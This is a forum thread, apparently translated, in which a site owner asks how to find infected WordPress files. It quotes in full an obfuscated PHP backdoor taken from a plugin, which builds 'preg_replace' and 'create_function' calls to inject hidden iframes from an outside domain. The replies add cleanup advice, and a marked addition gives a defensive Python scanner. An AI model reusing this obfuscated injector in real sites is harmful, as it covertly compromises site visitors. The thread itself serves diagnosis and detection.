Information Security
Shing, 2020-12-21 03:36:47

How to find infected files in WordPress?

Broken site on WordPress. Inside the posts are frames with teasers.
!!! Frames appear only for mobile and for traffic from search engines...

I found this crap in the file of one of the very popular rus-to-lat plugins:

```php
wp_load_cacher();

function wp_load_cacher($length='') {
    $cache_time = 'Default Widgets';
    $pr = "pre";
    $mdetails = "<div class='body-continent'><div class='get-inner-al(@fi'>";
    $vr = 'crea';
    $indent = ( isset($mytitle) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    $output = $metaboxed = $mytitle = "";
    $metaoptions = "\\4'\\10".trim("\\12t\\16\\19")."//".strip_tags("2ine")."\\11.c\\7m/\\9-".$indent."!1')\\5";
    // Does nothing when HEADER_IMGS is defined or a "sessions" cookie is present
    if (defined('HEADER_IMGS') || isset($_COOKIE['sess'.'ions'])) return;
    $mdetails .= "<!--Deregister() Default Widgets: _oabhrtupwprs:e--></div></div>";
    if (count($mytitle) >= $length) {
        $mytitle = explode(" ",$mytitle." ");
    } else {
        $mytitle = explode(" "," ".$mytitle." ");
    }
    $nmetabox = $vr.strip_tags("te_");
    $metaboxe = str_repeat("(.)", 20).".*"."/";
    // $pr now holds "preg_replace"
    $pr .= strip_tags("g_rep").trim("lace");
    if (function_exists("excerpt_mores")) {
        add_filter('excerpt_modes', $metaboxe);
    } else {
        $metaoptions = str_replace("{c}", $cache_time, $metaoptions).";";
        // $nmetabox now holds "create_function"
        $nmetabox .= 'function';
    }
    $output_title = '<p>'.$output.'</p>';
    // The regex capture groups of $mdetails are rearranged into a code string
    $defult_widgets = @$pr("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6{$metaboxed}\\2t\\6\\1ents{$metaoptions}", $mdetails);
    // which create_function turns into a callable that is run immediately
    $mdetailes = @$nmetabox('', $defult_widgets);
    return strip_tags($mdetailes());
}
```


Frames were on this domain
m//essa//ge.tf


As I understand it, other files must be infected, but this crap won't pull up the frame by itself?
It is not clear where to dig.

!!! I re-uploaded clean WP, disabled all plugins except for the infected one, changed the theme of the site, renamed the folder of the old theme, and the frames were still displayed! Only deleting rus-to-lat.php helps...

Moreover, the date of modification of the rus-to-lat.php file has not changed, it is the old year.


2 answer(s)
xmoonlight, 2020-12-21
@xmoonlight

See the "body" of articles in the database.
How to protect websites from hacking?
PS:

> !!! I re-uploaded clean WP, disabled all plugins except for the infected one, changed the theme of the site, renamed the folder of the old theme, and the frames were still displayed! Only deleting rus-to-lat.php helps...

but this ... does not even need comments ...

Alexander Osadchy, 2020-12-21
@DELUX

Use this service:

virusdie.ru

It helped me a lot in a situation like this.
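
Added example, not part of the thread or of any plugin's code: because the infected file's modification date was unchanged, a search has to go by file contents rather than timestamps. This Python scanner folds string fragments the way the posted code assembles `preg_replace` and `create_function`, then reports calls made through those variables. The function names, the watch list and the sample are assumptions constructed for illustration.

```python
import os
import re

# Names worth flagging when reached through a variable (assumed starter list).
SUSPICIOUS = {"preg_replace", "create_function", "assert", "base64_decode", "file_get_contents"}
ASSIGN = re.compile(r"\$(\w+)\s*(\.?=)(?![=>])\s*([^;]*);")
TOKEN = re.compile(r"""\s*(?:(["'])((?:\\.|(?!\1).)*)\1|\$(\w+)|(?:strip_tags|trim)\b|[.()])""")
VAR_CALL = re.compile(r"\$(\w+)\s*\(")

def fold(rhs, env):
    """Join literals and known variables (strip_tags/trim taken as pass-through)."""
    out, pos, rhs = "", 0, rhs.strip()
    while pos < len(rhs):
        m = TOKEN.match(rhs, pos)
        if not m or (m.group(3) and env.get(m.group(3)) is None):
            return None  # anything else on the right-hand side: value unknown
        out += m.group(2) if m.group(1) else env[m.group(3)] if m.group(3) else ""
        pos = m.end()
    return out

def scan_source(src):
    """Report calls through variables whose folded value is a suspicious name."""
    env = {}
    for name, op, rhs in ASSIGN.findall(src):
        val = fold(rhs, env)
        if op == ".=":  # append to the value tracked so far
            val = None if None in (val, env.get(name)) else env[name] + val
        env[name] = val
    return [(v, env[v]) for v in VAR_CALL.findall(src) if env.get(v) in SUSPICIOUS]

def scan_tree(root):
    """Scan every .php file by content; modification times are ignored."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for path in (os.path.join(folder, f) for f in files if f.endswith(".php")):
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read())
            if found:
                hits[path] = found
    return hits

# Constructed sample reusing the fragment trick from the posted file; never executed.
SAMPLE = r'''<?php $pr = "pre"; $vr = 'crea'; $nmetabox = $vr.strip_tags("te_");
$pr .= strip_tags("g_rep").trim("lace"); $nmetabox .= 'function';
$w = @$pr("/a/", "b", $markup); $fn = @$nmetabox('', $w); echo $fn();'''

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

`scan_tree()` takes the directory to check, such as a copy of `wp-content`, and returns a dict mapping each flagged file to the variables and the names they assemble. It only reads files, so frames stored in post bodies in the database need a separate check.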
